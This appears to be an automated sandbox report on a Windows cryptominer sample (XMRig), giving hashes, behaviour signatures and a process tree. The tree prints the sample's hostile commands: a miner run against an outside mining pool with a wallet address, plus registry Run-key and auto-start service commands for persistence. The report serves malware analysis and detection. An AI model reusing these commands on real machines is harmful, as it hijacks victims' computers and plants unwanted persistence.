Overview

overview

10

Static

static

3

63e7b5139a...18.exe

windows7-x64

10

63e7b5139a...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 16:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe

  • Size

    1.1MB

  • MD5

    63e7b5139afc6a5d54bebf5a518b2daf

  • SHA1

    8e4440701672ec7591f742de92e9748649ac156f

  • SHA256

    26fd2c3c123d9a18ec4311f5a82bbe79a4190a89bce0e4d73e251f357484468f

  • SHA512

    02ddcce9f5383a05c29b1bfb33e67379717bc08047228dc047c77c81796039a8702aa0b311eb253c4855f1910700412145d62cf2a2779ea0be88b833c020ed01

  • SSDEEP

    24576:GHlsQzLKOu9Bh+p/Ps01E6TbBYGvZby9l14+eHnC2Dk6:GFsQzNuU/PLhTVY39liPC29

Score
10/10
xmrigexecutionminerpersistenceupx

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 13 IoCs
    miner
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Executes dropped EXE 2 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\63e7b5139afc6a5d54bebf5a518b2daf_JaffaCakes118.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Windows\SysWOW64\lasse.exe
      C:\Windows\System32\lasse.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\Temp\kernel.exe
        C:\Windows\Temp\kernel.exe -a cryptonight -o pool.minexmr.com:5555 -u 47k5TbgFezTDNtJomYPgaDdk3dyQrHZvwYcnDSV6SnGCHGDP5UWMVFXFDBg25ekR5uTWjiETwQUukbQmmwDqAZ3A3aF4osR -p x -k --donate-level=1 -B
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5012
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lasse /t REG_SZ /d C:\Windows\System32\lasse.exe
      2⤵
      • Adds Run key to start application
      • Modifies registry key
      PID:3548
    • C:\Windows\SysWOW64\sc.exe
      sc.exe create lasse binPath= C:\Windows\System32\lasse.exe start= auto
      2⤵
      • Launches sc.exe
      PID:1320
    • C:\Windows\SysWOW64\net.exe
      net.exe start lasse
      2⤵
        PID:2320

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\SysWOW64\lasse.exe
      Filesize

      1012KB

      MD5

      6c8c1aa4ebcd402a607406fd2669e2c4

      SHA1

      5107b31ce5550182a8c6619326ac48b76bab8c16

      SHA256

      b3e8da8d5569375929102215fe3159699d1dc570e0297dee954ffd4dc13d42ad

      SHA512

      4753746873920506a9e2aefa1ee28cb9678699ab3512f573c0df2e552941b6383ccc4dedd64ae468fd6dad84710c2f92f589291e77d7b483c9e45d3e26a1709e

      Download Submit

    • C:\Windows\Temp\kernel.exe
      Filesize

      358KB

      MD5

      7ecc53614c641d9d6de10bb9f6363b50

      SHA1

      9829a35418f5f921e3ba16fe3f7b72e7c0a8a9e4

      SHA256

      9e5b3da1e5ece578ff99525d1ea565df458cdd62b305404336303ca8ca97f562

      SHA512

      72372ae7dad200f2c45c1ebb133ebea0a068f060b1e77c7c603de4f4046f92ebe6e6c8b9d4efd4679b773d59f8eb1e601c3fe73abe03b56d762d400a26f719dc

      Download Submit

    • memory/5012-7-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-8-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-9-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-10-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-11-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-12-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-13-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-14-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-15-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-16-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-17-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-18-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-19-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download

    • memory/5012-20-0x0000000000400000-0x00000000004E2000-memory.dmp

      Filesize

      904KB

      Download